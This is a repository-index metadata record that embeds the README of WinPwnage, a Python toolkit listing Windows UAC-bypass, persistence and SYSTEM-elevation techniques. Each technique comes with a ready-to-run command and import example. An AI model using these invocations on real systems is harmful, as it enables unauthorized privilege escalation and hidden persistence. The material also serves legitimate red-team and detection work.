{"id":13822245,"url":"https://github.com/rootm0s/WinPwnage","last_synced_at":"2025-05-16T15:33:34.181Z","repository":{"id":31711890,"uuid":"128671856","full_name":"rootm0s/WinPwnage","owner":"rootm0s","description":"UAC bypass, Elevate, Persistence methods","archived":false,"fork":false,"pushed_at":"2023-02-13T09:43:13.000Z","size":3245,"stargazers_count":2679,"open_issues_count":5,"forks_count":385,"subscribers_count":107,"default_branch":"master","last_synced_at":"2025-05-15T08:01:39.460Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rootm0s.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-04-08T18:51:50.000Z","updated_at":"2025-05-14T20:53:57.000Z","dependencies_parsed_at":"2023-02-14T19:35:37.096Z","dependency_job_id":null,"html_url":"https://github.com/rootm0s/WinPwnage","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rootm0s%2FWinPwnage","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rootm0s%2FWinPwnage/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rootm0s%2FWinPwnage/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rootm0s%2FWinPwnage/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rootm0s","download_url":"https://codeload.github.com/rootm0s/WinPwnage/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"gith
ub","repositories_count":254556824,"owners_count":22091007,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T08:01:50.693Z","updated_at":"2025-05-16T15:33:33.887Z","avatar_url":"https://github.com/rootm0s.png","language":"Python","readme":"\u003cp align=\"center\"\u003e\r\n  \u003cimg src=\"https://i.imgur.com/wVXtzEb.png\"\u003e\r\n\u003c/p\u003e\r\n\r\n---\r\n\r\n[![build_status](https://travis-ci.com/rootm0s/WinPwnage.svg?branch=master)](https://travis-ci.com/rootm0s/WinPwnage)\r\n![python3_support](https://img.shields.io/badge/Python-3-blue.svg \"Python 3\")\r\n\r\n* [Build into single executable](#building)\r\n* [Scan for compatible methods](#scanning)\r\n* [Importing and usage as module](#importing)\r\n* [UAC-bypass techniques](#uac-bypass-techniques)\r\n* [Persistence techniques](#persistence-techniques)\r\n* [Elevation techniques](#elevation-techniques)\r\n\r\n## Disclaimer\r\nThis tool is provided for educational and research purposes only. The authors of this project are in no way responsible for any misuse of this tool.\r\n\r\n## Building\r\n
This build works on Python \u003e= 3.6 and puts the .exe file into the __dist__ directory. Install pyinstaller using pip command:\r\n```batch\r\npip install pyinstaller\r\n```\r\nAnd run the following command:\r\n```batch\r\npyinstaller --onefile main.py\r\n```\r\n\r\n## Scanning\r\nCompares the local Windows build number against each method's 'Fixed in' build number and displays the results.\r\n```batch\r\nmain.py --scan uac\r\nmain.py --scan persist\r\nmain.py --scan elevate\r\n```\r\n\r\nExample results when scanning for possible UAC methods\r\n```\r\n Id:    Type:           Compatible:     Description:\r\n ----   ------          -----------     -------------\r\n 1      UAC bypass      No              UAC bypass using runas\r\n 2      UAC bypass      Yes             UAC bypass using fodhelper.exe\r\n 3      UAC bypass      Yes             UAC bypass using slui.exe\r\n 4      UAC bypass      Yes             UAC bypass using silentcleanup scheduled task\r\n 5      UAC bypass      No              UAC bypass using sdclt.exe (isolatedcommand)\r\n 6      UAC bypass      No              UAC bypass using sdclt.exe (App Paths)\r\n 7      UAC bypass      No              UAC bypass using perfmon.exe\r\n```\r\n\r\n## Importing\r\nBypass UAC using uacMethod2\r\n```python\r\nfrom winpwnage.functions.uac.uacMethod2 import uacMethod2\r\nuacMethod2([\"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/k\", \"whoami\"])\r\n```\r\n\r\nPersist on system using persistMethod4\r\n```python\r\nfrom winpwnage.functions.persist.persistMethod4 import persistMethod4\r\npersistMethod4([\"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/k\", \"whoami\"], add=True)\r\n\r\n# Removal\r\npersistMethod4([\"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/k\", \"whoami\"], add=False)\r\n```\r\n\r\nElevate from administrator to SYSTEM using elevateMethod1\r\n```python\r\nfrom winpwnage.functions.elevate.elevateMethod1 import elevateMethod1\r\nelevateMethod1([\"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/k\", \"whoami\"])\r\n```\r\n\r\n## UAC bypass techniques\r\n
\u003cdetails\u003e\r\n\u003csummary\u003eFunctions (Expand/Collapse)\u003c/summary\u003e\r\n\r\n* UAC bypass using runas\r\n    * Id: 1\r\n    * Method: Windows API; this only works if UAC is set to never notify\r\n    * Syntax: `main.py --use uac --id 1 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* UAC bypass using fodhelper.exe\r\n    * Id: 2\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 2 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 10240\r\n    * Fixed in: n/a\r\n* UAC bypass using slui.exe\r\n    * Id: 3\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 3 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 9600\r\n    * Fixed in: n/a\r\n* UAC bypass using silentcleanup scheduled task\r\n    * Id: 4\r\n    * Method: Registry key (Environment) manipulation; this bypasses UAC's Always Notify.\r\n    * Syntax: `main.py --use uac --id 4 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 9600\r\n    * Fixed in: n/a\r\n* UAC bypass using sdclt.exe (isolatedcommand)\r\n    * Id: 5\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 5 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 10240\r\n    * Fixed in: 17025\r\n* UAC bypass using sdclt.exe (App Paths)\r\n    * Id: 6\r\n    * Method: Registry key (App Paths) manipulation\r\n    * Syntax: `main.py --use uac --id 6 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 10240\r\n    * Fixed in: 16215\r\n* UAC bypass using perfmon.exe\r\n    * Id: 7\r\n    * Method: Registry key (Volatile Environment) manipulation\r\n    * Syntax: `main.py --use uac --id 7 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 7600\r\n    * Fixed in: 16299\r\n* UAC bypass using eventvwr.exe\r\n    * Id: 8\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 8 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 7600\r\n    * Fixed in: 15031\r\n* UAC bypass using compmgmtlauncher.exe\r\n    * Id: 9\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 9 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 7600\r\n    * Fixed in: 15031\r\n* UAC bypass using computerdefaults.exe\r\n    * Id: 10\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 10 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 10240\r\n    * Fixed in: n/a\r\n* UAC bypass using token manipulation\r\n    * Id: 11\r\n    * Method: Token manipulation\r\n    * Syntax: `main.py --use uac --id 11 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 7600\r\n    * Fixed in: 17686\r\n* UAC bypass using sdclt.exe (Folder)\r\n    * Id: 12\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 12 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 14393\r\n    * Fixed in: n/a\r\n* UAC bypass using cmstp.exe\r\n    * Id: 13\r\n    * Method: Malicious ini file\r\n    * Syntax: `main.py --use uac --id 13 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* UAC bypass using wsreset.exe\r\n    * Id: 14\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 14 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 17134\r\n    * Fixed in: n/a\r\n* UAC bypass using slui.exe and changepk.exe\r\n    * Id: 15\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 15 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Works from: 17763\r\n    * Fixed in: n/a\r\n\u003c/details\u003e\r\n\r\n## Persistence techniques\r\n
\u003cdetails\u003e\r\n\u003csummary\u003eFunctions (Expand/Collapse)\u003c/summary\u003e\r\n\r\n* Persistence using mofcomp.exe (SYSTEM privileges)\r\n    * Id: 1\r\n    * Method: Malicious mof file using EventFilter EventConsumer and binding\r\n    * Syntax: `main.py --use persist --id 1 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 1 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using schtasks.exe (SYSTEM privileges)\r\n    * Id: 2\r\n    * Method: Malicious scheduled task\r\n    * Syntax: `main.py --use persist --id 2 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 2 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using image file execution option and magnifier.exe\r\n    * Id: 3\r\n    * Method: Image File Execution Options debugger and accessibility application\r\n    * Syntax: `main.py --use persist --id 3 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 3 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using userinit key\r\n    * Id: 4\r\n    * Method: Registry key (UserInit) manipulation\r\n    * Syntax: `main.py --use persist --id 4 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 4 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using HKCU run key\r\n    * Id: 5\r\n    * Method: Registry key (HKCU Run) manipulation\r\n    * Syntax: `main.py --use persist --id 5 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 5 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: n/a\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using HKLM run key\r\n    * Id: 6\r\n    * Method: Registry key (HKLM Run) manipulation\r\n    * Syntax: `main.py --use persist --id 6 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 6 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using wmic.exe (SYSTEM privileges)\r\n    * Id: 7\r\n    * Method: Malicious mof file using EventFilter EventConsumer and binding\r\n    * Syntax: `main.py --use persist --id 7 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 7 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using startup files\r\n    * Id: 8\r\n    * Method: Malicious lnk file in startup directory\r\n    * Syntax: `main.py --use persist --id 8 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 8 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: n/a\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using cortana windows app\r\n    * Id: 9\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use persist --id 9 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 9 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: n/a\r\n    * Works from: 14393\r\n    * Fixed in: n/a\r\n* Persistence using people windows app\r\n    * Id: 10\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use persist --id 10 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 10 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: n/a\r\n    * Works from: 14393\r\n    * Fixed in: n/a\r\n* Persistence using bitsadmin.exe\r\n    * Id: 11\r\n    * Method: Malicious bitsadmin job\r\n    * Syntax: `main.py --use persist --id 11 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 11 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using Windows Service (SYSTEM privileges)\r\n    * Id: 12\r\n    * Method: Malicious Windows Service\r\n    * Syntax: `main.py --use persist --id 12 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 12 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n\u003c/details\u003e\r\n\r\n## Elevation techniques\r\n
\u003cdetails\u003e\r\n\u003csummary\u003eFunctions (Expand/Collapse)\u003c/summary\u003e\r\n\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using handle inheritance\r\n    * Id: 1\r\n    * Method: Handle inheritance\r\n    * Syntax: `main.py --use elevate --id 1 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using token impersonation\r\n    * Id: 2\r\n    * Method: Token impersonation\r\n    * Syntax: `main.py --use elevate --id 2 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using named pipe impersonation\r\n    * Id: 3\r\n    * Method: Named pipe impersonation\r\n    * Syntax: `main.py --use elevate --id 3 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using schtasks.exe (non interactive)\r\n    * Id: 4\r\n    * Method: Malicious scheduled task that gets deleted once used\r\n    * Syntax: `main.py --use elevate --id 4 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using wmic.exe (non interactive)\r\n    * Id: 5\r\n    * Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used\r\n    * Syntax: `main.py --use elevate --id 5 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using Windows Service (non interactive)\r\n    * Id: 6\r\n    * Method: Malicious Windows Service that gets deleted once used\r\n    * Syntax: `main.py --use elevate --id 6 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using mofcomp.exe (non interactive)\r\n    * Id: 7\r\n    * Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used\r\n    * Syntax: `main.py --use elevate --id 7 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n\u003c/details\u003e\r\n\r\n## Read\r\n
* https://wikileaks.org/ciav7p1/cms/page_2621770.html\r\n* https://wikileaks.org/ciav7p1/cms/page_2621767.html\r\n* https://wikileaks.org/ciav7p1/cms/page_2621760.html\r\n* https://msdn.microsoft.com/en-us/library/windows/desktop/bb736357(v=vs.85).aspx\r\n* https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\r\n* https://github.com/winscripting/UAC-bypass/\r\n* https://www.greyhathacker.net/?p=796\r\n* https://github.com/hfiref0x/UACME\r\n* https://bytecode77.com/hacking/exploits/uac-bypass/performance-monitor-privilege-escalation\r\n* https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation\r\n* https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20workshops/DEFCON-25-Workshop-Ruben-Boobeb-UAC-0day-All-Day.pdf\r\n* https://lolbas-project.github.io\r\n","funding_links":[],"categories":["Python","Python (1887)","others","Operating Systems","Windows"],"sub_categories":["Windows","Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootm0s%2FWinPwnage","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frootm0s%2FWinPwnage","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootm0s%2FWinPwnage/lists"}